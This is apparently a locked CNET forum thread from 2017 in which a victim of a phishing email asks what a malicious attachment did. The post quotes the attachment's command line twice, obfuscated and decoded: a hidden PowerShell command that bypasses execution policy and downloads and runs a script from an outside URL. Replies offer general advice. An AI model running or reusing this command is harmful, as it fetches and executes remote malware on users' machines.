Thank you for being a valued part of the CNET community. As of December 1, 2020, the forums are in read-only format. In early 2021, CNET Forums will no longer be available. We are grateful for the participation and advice you have provided to one another over the years.

Thanks,

CNET Support

Question

I believe a script has run on my pc from a downloaded link

May 18, 2017 7:57AM PDT

This looked legitimate and a text file. Email had my name, address, phone number etc about an order I`d placed. It`s the first one I`ve fallen for but looked genuine.


My virus scanners aren`t showing anything but I`m obviously concerned this is a virus / Trojan.

It is a notepad link, but the command line for the link that is the concern.

"C:\Windows\System32\cmd.exe /c "set bpo=pow&& set nul=ershell&& cmd /c %bpo%%nul% -w HidDen -eP bypass -c IEX ((NEw-OBjE`ct ('nE'+'T.W'+'ebc'+'lienT')).('dOWnlo'+'AdstRinG').InVoKe(('htt'+'ps:/'+'/bytc'+'ard.c'+'om/crafi'+'lg/bloom')));"

which when you remove the '+' and make it all the same case is a hidden cmd script.

Anyone able to shed any light on what this is / has done / how I can remove it ?

Discussion is locked

- Collapse -
Answer
What did you download?
May 18, 2017 8:18AM PDT
- Collapse -
It was a link attached to an email
May 18, 2017 8:34AM PDT

Apologies for the detail, I don`t know what else to tell you ?

The file was attached to an email, the file was empty but on closer inspection the script is the command line
http://i20.photobucket.com/albums/b207/wh00sher/12017/con2.jpg

I`m concerned that has now downloaded and run something on my computer but don`t know what to check.

- Collapse -
Since it was an email from
May 18, 2017 9:13AM PDT

Someone, ask them to explain what they are doing. What I have so far doesn't tell me enough.

In spite of that I can offer ideas such as scanning with Grif's help (see link above), removing the download item and email them to tell them what you want to say about this.

- Collapse -
Answer
leave it alone
May 18, 2017 7:14PM PDT

If still can't figure what it is, just leave it alone and do not open the link. Ordering information leak is not fresh any more. Related data can be acquired by various illegal ways. A friend of mine even lost $4000 in an email fraud. But the situation is quite different. Anyway, you'd better not open the link when it's not proved safe.

- Collapse -
already opened
May 19, 2017 2:03AM PDT

The attachment has already been opened, hence me posting this thread. Sad

The issue is, I don`t know what "C:\Windows\System32\cmd.exe /c set bpo=pow&& set nul=ershell&& cmd /c %bpo%%nul% -w hidden -ep bypass -c iex ((new-obje`ct ('net.webclient')).('downloadstring').Invoke(('https://bytcard.com/crafilg/bloom'))); has done and that`s what I`m asking.

My issue isn`t removing the link, that was just a case of deleting the email. I`ve run numerous scanners to try and find anything but none pick anything up. It`s the first time I`ve seen this type of script as a command link to an attached link and possibly why the virus scanners didn`t pick it up. The email arrived seconds after placing an online order at a well known retailer which is why I thought it was genuine, just a case of bad timing. The email from the seller arrived a minute later.